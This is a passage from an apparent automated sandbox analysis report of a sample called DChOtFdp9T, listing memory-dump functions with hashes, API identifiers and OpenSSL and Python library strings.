                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6A214F11B1CA8241E744A752A971ABA5750AF857C0F884231EE3ECBBCFEE6CE5424B04
                                                                                                                                                                                                                            Function 00007FFDFF25FD40 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 63COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: C_get_current_jobR_newR_set_debugR_set_error
                                                                                                                                                                                                                            • String ID: ..\s\ssl\ssl_lib.c$SSL_do_handshake
                                                                                                                                                                                                                            • API String ID: 2134390360-2964568172
                                                                                                                                                                                                                            • Opcode ID: 3e19f5133db6f9f0995d995d45ee5f37c3958f709a5efffcd3d50ec949d9a66b
                                                                                                                                                                                                                            • Instruction ID: 630f704980922927ab5b4fcbac0472736938544186997a4d66a516671d587b11
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3e19f5133db6f9f0995d995d45ee5f37c3958f709a5efffcd3d50ec949d9a66b
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4021C122F0874242E745AB25E421AB96351AFC9794F5C0330EE7DC67CBDE2CE5818A40
                                                                                                                                                                                                                            Function 00007FF6029A9FD0 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Value$ErrorLast
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2506987500-0
                                                                                                                                                                                                                            • Opcode ID: 80df790e4dc20ce4daf526b56dc0de662265a938807179003cfdcd9a3866f9da
                                                                                                                                                                                                                            • Instruction ID: 7641d18633335180a6573666d5c874795cd9774ed52d63362414a19d8978bc5d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 80df790e4dc20ce4daf526b56dc0de662265a938807179003cfdcd9a3866f9da
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 67218020E0C75242FB599723564217959625F49BACF340734E83E87AD7DEEDB4008390
                                                                                                                                                                                                                            Function 00007FFDFF267F70 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 59COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debugR_set_error
                                                                                                                                                                                                                            • String ID: ..\s\ssl\ssl_lib.c$ssl_peek_internal
                                                                                                                                                                                                                            • API String ID: 1552677711-1363730714
                                                                                                                                                                                                                            • Opcode ID: 1b333764648ff260a6c02d2ac8eded9e182aa65c1543dabf16a4d074aade2757
                                                                                                                                                                                                                            • Instruction ID: 9e79c05b7723c34f5677098492e6de6c7a101f6a996065f349e36fac0b3cad89
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1b333764648ff260a6c02d2ac8eded9e182aa65c1543dabf16a4d074aade2757
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 56217F31B08B8282E7109B11E561AE97760EB84BD4F580631EEBDC77E9DF3CE4518B00
                                                                                                                                                                                                                            Function 00007FFDFF2B5D6C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 59COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: O_clear_flagsO_set_flagsR_newR_set_debug
                                                                                                                                                                                                                            • String ID: ..\s\ssl\statem\statem_srvr.c$ossl_statem_server_read_transition
                                                                                                                                                                                                                            • API String ID: 4119164335-396436010
                                                                                                                                                                                                                            • Opcode ID: 3b9942497a00dddd29993045adddac0f6e5e25eb10adb42d596a6deddd5604e0
                                                                                                                                                                                                                            • Instruction ID: 5d5301323132f91f759054eccc64c1f46867e97f058fd7e528cf647e0192098e
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3b9942497a00dddd29993045adddac0f6e5e25eb10adb42d596a6deddd5604e0
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F8116061F062464AFB959B61D466BBC2381DB81B04F884234CE3CCA6CEDF7C98818B04
                                                                                                                                                                                                                            Function 00007FF6029929E0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58windowCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Message$ErrorFormatLast
                                                                                                                                                                                                                            • String ID: %ls%ls: %ls$<FormatMessageW failed.>$Error
                                                                                                                                                                                                                            • API String ID: 3971115935-1149178304
                                                                                                                                                                                                                            • Opcode ID: 637b316d3db02e0848746ebbd2d4d607b7aa0f267e08e9a77fe1f48c74dfad2f
                                                                                                                                                                                                                            • Instruction ID: 2baa6b743cd14df1a889a36e9120847630a5caa08db5a6047544937fc12f6445
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 637b316d3db02e0848746ebbd2d4d607b7aa0f267e08e9a77fe1f48c74dfad2f
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E2217172618B8192E720DB16F4502EA77A4FF88788F500136EBCD93A99DFBCD156CB40
                                                                                                                                                                                                                            Function 00007FFDFF241DCA Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debug
                                                                                                                                                                                                                            • String ID: ..\s\ssl\statem\extensions_clnt.c$tls_parse_stoc_supported_versions
                                                                                                                                                                                                                            • API String ID: 193678381-4079417333
                                                                                                                                                                                                                            • Opcode ID: ea19e3c1eec7e63e05fd280717a0f3d5609df9ba7246379ff7d219529d572970
                                                                                                                                                                                                                            • Instruction ID: 898d464a08116e72c3d731d91dac0f0d1e5ae3db903c15de0a89aa4bd2bacc00
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ea19e3c1eec7e63e05fd280717a0f3d5609df9ba7246379ff7d219529d572970
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5811B261B0968242F766A765E831FF92B90AF84740F845131DA7CC3BDBDE2DE6919B00
                                                                                                                                                                                                                            Function 00007FFDFF28ED20 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 54COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debug
                                                                                                                                                                                                                            • String ID: ..\s\ssl\statem\extensions.c$final_ems
                                                                                                                                                                                                                            • API String ID: 193678381-1856277603
                                                                                                                                                                                                                            • Opcode ID: cce74bf344d7d4a08a0a5a9e15c6f18873a729b9b1b0b583b057dde68333db6c
                                                                                                                                                                                                                            • Instruction ID: eeb0e4a572aa4205136fbc20c80ab6f80d194e6f32888f53729115b18e783f40
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cce74bf344d7d4a08a0a5a9e15c6f18873a729b9b1b0b583b057dde68333db6c
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1511EF20F0960346F794A3E6D829FF82311AB85700F848232C93CC77DADE3DA58AC700
                                                                                                                                                                                                                            Function 00007FF6029B6D4C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                            • String ID: CONOUT$
                                                                                                                                                                                                                            • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                            • Opcode ID: 17f0a2ce441502ced7ada2557d00087b7598f0e631849b46a0ea05360e476559
                                                                                                                                                                                                                            • Instruction ID: a766c2c9121e7f1eff9ce8c99fcdf14da72c8e044ea36689464694f4b191c2aa
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 17f0a2ce441502ced7ada2557d00087b7598f0e631849b46a0ea05360e476559
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EC119D21B18A4186E7918B57E944329BAA4FF98FE8F600234EA5DC7795CFBCE9048740
                                                                                                                                                                                                                            Function 00007FFDFABD1150 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 40COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • _PyArg_CheckPositional.PYTHON312 ref: 00007FFDFABD36E7
                                                                                                                                                                                                                            • _PyArg_BadArgument.PYTHON312 ref: 00007FFDFABD371A
                                                                                                                                                                                                                              • Part of subcall function 00007FFDFABD11B0: PyUnicode_CompareWithASCIIString.PYTHON312 ref: 00007FFDFABD11E2
                                                                                                                                                                                                                              • Part of subcall function 00007FFDFABD11B0: PyUnicode_CompareWithASCIIString.PYTHON312 ref: 00007FFDFABD11FA
                                                                                                                                                                                                                              • Part of subcall function 00007FFDFABD11B0: PyType_IsSubtype.PYTHON312 ref: 00007FFDFABD121D
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875123056.00007FFDFABD1000.00000020.00000001.01000000.00000019.sdmp, Offset: 00007FFDFABD0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875105491.00007FFDFABD0000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFABD5000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFAC32000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFAC7E000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFAC82000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFAC87000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFACDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875292663.00007FFDFACE2000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875308130.00007FFDFACE4000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfabd0000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Arg_CompareStringUnicode_With$ArgumentCheckPositionalSubtypeType_
                                                                                                                                                                                                                            • String ID: argument 1$argument 2$normalize$str
                                                                                                                                                                                                                            • API String ID: 4101545800-1320425463
                                                                                                                                                                                                                            • Opcode ID: 6a3206665d50624963465f038f79663c2d3d68664346081dad0779ef5a43a2b4
                                                                                                                                                                                                                            • Instruction ID: f42d331a38eede78dcee9c7d0e702c4fe540a65d157d5f176a06af2b2cfb8852
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6a3206665d50624963465f038f79663c2d3d68664346081dad0779ef5a43a2b4
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 241152A1B0C68790EB588B56E4A1EB96760AF04FC4FD880B6D92D076DDDF3CD545D340
                                                                                                                                                                                                                            Function 00007FFDFABD4870 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 39COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875123056.00007FFDFABD1000.00000020.00000001.01000000.00000019.sdmp, Offset: 00007FFDFABD0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875105491.00007FFDFABD0000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFABD5000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFAC32000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFAC7E000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFAC82000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFAC87000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFACDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875292663.00007FFDFACE2000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875308130.00007FFDFACE4000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfabd0000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Arg_$ArgumentCheckPositional
                                                                                                                                                                                                                            • String ID: argument 1$argument 2$is_normalized$str
                                                                                                                                                                                                                            • API String ID: 3876575403-184702317
                                                                                                                                                                                                                            • Opcode ID: 7c950a274d1c530a4e2b2ee5c75bc666441a244dd8d061769435580234d1272f
                                                                                                                                                                                                                            • Instruction ID: 513ddbc7d94e1e7fa498c1fff9ff648eb44484d7b9e9659e954cbbd2c548ebdd
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7c950a274d1c530a4e2b2ee5c75bc666441a244dd8d061769435580234d1272f
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2A015E61F0868694EB588B56E4A1EB92760AB44FC4F9880B1D97E176DCCF3CD489C740
                                                                                                                                                                                                                            Function 00007FFDFF248F00 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 37stringCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debugR_set_error$L_sk_freeL_sk_new_nullstrncmp
                                                                                                                                                                                                                            • String ID: ..\s\ssl\d1_srtp.c$ssl_ctx_make_profiles
                                                                                                                                                                                                                            • API String ID: 3277051535-118859582
                                                                                                                                                                                                                            • Opcode ID: e25ab8b59099c03fe3cf6e5ae37756265d9713b7ab3def9badebe2b4057b6564
                                                                                                                                                                                                                            • Instruction ID: 15616073ef9bab02cc3d775dcc007e78c45695da56abb86377e1ed608538caa8
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e25ab8b59099c03fe3cf6e5ae37756265d9713b7ab3def9badebe2b4057b6564
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C9F0A412B0965246F744A755A822BE95350AF45754F848231EE3CC6BDBEE6CEA424B00
                                                                                                                                                                                                                            Function 00007FFDFF241E01 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 27COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debugR_set_errormemcpy
                                                                                                                                                                                                                            • String ID: ..\s\ssl\ssl_sess.c$SSL_SESSION_set1_id_context
                                                                                                                                                                                                                            • API String ID: 1331007688-3187944184
